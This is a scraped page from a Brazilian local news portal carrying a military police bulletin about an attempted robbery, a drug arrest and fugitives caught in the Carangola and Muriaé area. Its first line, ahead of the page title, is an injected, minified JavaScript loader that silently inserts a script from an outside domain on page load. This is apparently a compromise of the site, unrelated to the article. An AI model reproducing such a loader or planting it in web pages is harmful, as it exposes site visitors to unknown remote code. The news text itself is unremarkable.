;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais - Carangola e Região - 12/02/14. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais – Carangola e Região – 12/02/14.

pmbn

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 12/02/2014

                        75ª CIA PM- CARANGOLA-MG

ROUBO TENTADO A TRANSEUNTE EM CARANGOLA-MG.

         Em 11/02/14, às 17hs50min, policiais militares em patrulhamento, foram acionados pela vítima Z.A.B., de 66 anos, que relatou haver sido abordado por um cidadão que pedia dinheiro para comprar cachaça, tendo a vítima relatado que não possuía nenhum valor, ocasião que o adolescente infrator A.F.A., de 17 anos, agarrou a vítima pelo pescoço com intenção de subtrair a sua carteira, tendo a vítima gritado por socorro, e assim o adolescente o largou. Após rastreamento pela cidade, o adolescente foi localizado e apreendido não sendo nada de ilícito localizado em seu poder, sendo o mesmo encaminhado a delegacia de polícia acompanhado de um conselheiro tutelar.    

                        76ª CIA PM – MURIAÉ

ASSOCIAÇÃO PARA O TRÁFICO DE DROGAS EM BARÃO DO MONTE ALTO-MG.          

Em 11/02/14, por volta das 16hs30min, policiais militares do Destacamento de Barão do Monte Alto em conjunto com policiais da 76ª Cia PM, após receberem denúncias de que havia na cidade alguns indivíduos oriundos da cidade de Palma-MG, com o objetivo de associarem a outros elementos daquela cidade para praticarem furtos e venda de drogas. Os policiais imediatamente, passaram a monitorar tais suspeitos, vindo a perceber que os mesmos estiveram rondando alguns pontos comerciais da cidade, e que denúncias davam conta que os suspeitos estariam na residencia de uma jovem, contudo, antes de chegarem a residência os policiais perceberam da movimentação de tais envolvidos na embalagem de drogas em um matagal ao lado de uma igreja católica, no bairro arraial velho, sendo presos os autores S.P.S., 19 anos, J.F.M, de 20 anos, E.T.A, 18anos, P.H.B.D, de 18 anos e o adolescente R.S.S 16 anos apreendido, sendo que foi recolhido 11 buchas de maconha e um pequeno tablete da mesma substância. Os autores foram encaminhados para delegacia de polícia em Muriaé, sendo ratificado o flagrante pelo delegado de plantão.

FORAGIDOS DA JUSTIÇA EM MURIAÉ-MG.

Em 11/02/14, policiais militares em patrulhamento pela RUA Amaro Acelino de Andrade, bairro São Francisco, por volta das 07hs20min, localizaram o suspeito J.G.M, de 35 anos, sendo constatado que havia em seu desfavor um mandado de prisão. Já por volta das 10hs05min, outra equipe policial localizou pela Rua Santo Antônio, Bairro Santo Antônio, o adolescente J.H.F.S, de 16 anos, foragido do estabelecimento PEMSE, sendo ambos os envolvidos encaminhados para a delegacia de polícia .

 ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.